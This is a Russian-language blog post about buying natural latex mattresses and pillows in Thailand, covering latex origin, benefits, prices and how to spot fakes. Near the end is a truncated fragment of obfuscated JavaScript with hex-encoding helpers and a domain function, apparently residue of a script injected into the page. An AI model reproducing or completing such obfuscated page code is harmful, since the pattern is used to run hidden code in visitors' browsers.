Чтобы стать миллиардером, нужна прежде всего удача, значительная доза знаний, огромная работоспособность, но самое главное – вы должны иметь менталитет миллиардера. Менталитет миллиардера – это такое состояние ума, при котором вы сосредотачиваете все свои знания, все свои умения, все свои навыки на достижении поставленной цели.  Пол Гетти

Латексные матрасы из Тайланда

Опубликовано: 09.10.2018

видео Латексные матрасы из Тайланда

Матрас из 100 % натурального латекса

Если вы хотите привезти из Тайланда в качестве сувенира не безделушку вроде брелка или магнита, а что-то, что пригодится  быту — тогда Вам стоит присмотреться к латексным матрасам и подушкам.



Конечно же, их можно приобрести и в магазине у себя в городе, но, во-первых вы переплатите, во-вторых, качество такого товара не всегда внушает доверие. Наполнитель матраса — натуральный латекс- это застывший сок гевеи (или каучукового дерева), родиной которой является Бразилия, из которой его позже завезли в Тайланд. В Тайланде Вы можете увидеть целые рощи гевеи. Собирают сок гевеи (его еще называют «резиновое молоко») примерно так же, как и сосновую смолу. Делают надрезы на стволе и подставляют под стекающий сок специальные конусообразные емкости. Причем собирать сок полагается лишь из молодых деревьев в возрасте от десяти до тридцати лет. Недостатка в растениях у сборщиков нет: в теплом влажном климате Тайланда все растет настолько буйно, что заросли гевеи, напротив, приходится прореживать. Ценится и древесина гевеи, так как она очень прочна и исключительно влагоустойчива.


Упаковка латексного матраса на Пхукете

Таким образом натуральный латекс — это экологически чистый материал.

Итак, откуда берется латекс, мы выяснили. Но почему стоит покупать именно латексные, а не привычные нам с детства пуховые матрасы? Натуральный латекс гипоалегренный, нетоксичный, хорошо поглощает влагу, отлично держит форму и повторяет каждый изгиб Вашего тела, позволяя полностью расслабиться и выспаться по-настоящему. Латекс известен своими антибактериальными свойствами, а специальные отверстия в матрасе способствуют отличной циркуляции воздуха. Взбивать, просушивать матрас, а иногда и полностью менять его содержимое? Забудьте, как страшный сон.


Латексные подушки из магазина "Sweet Dreams Latex", развод туристов

Купить матрасы из натурального латекса лучше всего приобретать в местах производства или в специализированных магазинах, работающих с поставщиком напрямую. Стоимость матраса от 7 тыс бат, подушки — от 1,5 тыс. бат. У перекупщиков, разумеется, еще дороже. Как отличить натуральный латекс от искусственного? Во-первых, по цвету: натуральный латекс сероватого или же кремового оттенка, тогда как искусственный -чисто белого цвета. Во-вторых, по запаху: натуральный латекс имеет специфический аромат (напоминающий молоко). Ищите бирку с надписью «100% Latex», иначе есть вероятность приобрести подделку. И самое главное: искусственный латекс впитывает воду как губка. Также не стоит приобретать матрасы на рынках.

В магазине вам обязательно упакую товар с помощью вакуума, так что купленный матрас будет компактнее раз в пять.

Дома обязательно прочитайте инструкцию. Нелишним будет знать, что латекс боится переохлаждения (становится хрупким), а также прямых солнечных лучей. И помните, что покупая качественный товар, вы заботитесь о своем здоровье.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "about-thailand.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Читайте также:

 

Календарь

Реклама

Цитата дня

Я никогда ничего не покупаю, если не могу на одной бумаге описать мои объяснения и причины. Я могу ошибаться, но я буду знать ответ этому. «Я плачу 32 миллиарда долларов за компанию Coca-Cola, потому что…» И если вы не можете ответить на этот вопрос, вам не стоит покупать эти акции. Но если вы ответите на этот вопрос и сделаете это несколько раз, вы заработаете много денег.   Уоррен Баффетт
rss